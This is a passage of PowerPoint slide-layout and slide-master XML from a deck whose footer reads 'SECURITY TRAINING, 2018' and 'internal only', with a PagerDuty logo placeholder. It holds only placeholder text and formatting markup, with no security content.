          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2440352" y="12962776"/>
            <a:ext cx="3430388" cy="422276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="https://link"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051818" y="12544209"/>
            <a:ext cx="22381964" cy="447676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="2000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId3" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Image"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="26"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="735727" y="12616767"/>
            <a:ext cx="309895" cy="309894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>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ing">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="FFFFFF"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="869950" y="4536281"/>
            <a:ext cx="22644099" cy="4643438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-270" y="-4203"/>
            <a:ext cx="24384539" cy="107941"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C151"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="584200">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:defRPr b="1" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="PagerDuty_logo_GREEN.png"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="743302" y="12987118"/>
            <a:ext cx="1691863" cy="324838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Circle"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5389033" y="13055778"/>
            <a:ext cx="212726" cy="212726"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C62818"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" defTabSz="584200">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="3400"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="internal only"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5602652" y="12962776"/>
            <a:ext cx="2631762" cy="422276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" cap="all" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>internal only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2440352" y="12962776"/>
            <a:ext cx="3430388" cy="422276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</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FFFFFF"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="958453" y="625078"/>
            <a:ext cx="22353968" cy="3036094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-270" y="-4203"/>
            <a:ext cx="24384539" cy="107941"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C151"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="584200">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:defRPr b="1" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="PagerDuty_logo_GREEN.png"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="743302" y="12987118"/>
            <a:ext cx="1691863" cy="324838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Circle"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5389033" y="13055778"/>
            <a:ext cx="212726" cy="212726"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C62818"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" defTabSz="584200">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="3400"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="internal only"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5602652" y="12962776"/>
            <a:ext cx="2631762" cy="422276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" cap="all" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>internal only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2440352" y="12962776"/>
            <a:ext cx="3430388" cy="422276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</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100" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-270" y="-4203"/>
            <a:ext cx="24384539" cy="107941"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C151"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="584200">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:defRPr b="1" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="PagerDuty_logo_GREEN.png"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="743302" y="12987118"/>
            <a:ext cx="1691863" cy="324838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Circle"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5389033" y="13055778"/>
            <a:ext cx="212726" cy="212726"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C62818"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" defTabSz="584200">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="3400"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="internal only"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5602652" y="12962776"/>
            <a:ext cx="2631762" cy="422276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" cap="all" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>internal only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2440352" y="12962776"/>
            <a:ext cx="3430388" cy="422276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</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Heading (Green)">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="25C151"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="840306" y="4536281"/>
            <a:ext cx="22703388" cy="4643438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="Image"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="743302" y="12987118"/>
            <a:ext cx="1691863" cy="324838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Circle"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5389033" y="13055778"/>
            <a:ext cx="212726" cy="212726"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C62818"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" defTabSz="584200">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="3400"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="internal only"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5602652" y="12962776"/>
            <a:ext cx="2631762" cy="422276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" cap="all" sz="1800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>internal only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2440352" y="12962776"/>
            <a:ext cx="3430388" cy="422276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</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353535"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="958453" y="625078"/>
            <a:ext cx="22390894"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996553" y="3661171"/>
            <a:ext cx="22390894" cy="819745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l" defTabSz="821531"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Helvetica"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="0" marR="0" indent="228600" algn="l" defTabSz="821531"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Helvetica"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="0" marR="0" indent="457200" algn="l" defTabSz="821531"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Helvetica"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="0" marR="0" indent="685800" algn="l" defTabSz="821531"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Helvetica"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="0" marR="0" indent="914400" algn="l" defTabSz="821531"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Helvetica"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="0" marR="0" indent="1143000" algn="l" defTabSz="821531"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Helvetica"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="0" marR="0" indent="1371600" algn="l" defTabSz="821531"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Helvetica"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="0" marR="0" indent="1600200" algn="l" defTabSz="821531"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Helvetica"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="0" marR="0" indent="1828800" algn="l" defTabSz="821531"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Helvetica"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="617361" marR="0" indent="-617361" algn="l" defTabSz="821531" latinLnBrk="0">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="5900"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="0"/>
        </a:spcAft>
        <a:buClrTx/>
        <a:buSzPct val="75000"/>
        <a:buFontTx/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr b="0" baseline="0" cap="none" i="0" spc="0" strike="noStrike" sz="5000" u="none">
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:uFillTx/>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
          <a:sym typeface="Helvetica"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="1061861" marR="0" indent="-617361" algn="l" defTabSz="821531" latinLnBrk="0">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="5900"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="0"/>
        </a:spcAft>
        <a:buClrTx/>
        <a:buSzPct val="75000"/>
        <a:buFontTx/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr b="0" baseline="0" cap="none" i="0" spc="0" strike="noStrike" sz="5000" u="none">
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:uFillTx/>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
          <a:sym typeface="Helvetica"/>
        </a:defRPr>
      </a:lvl2pPr>
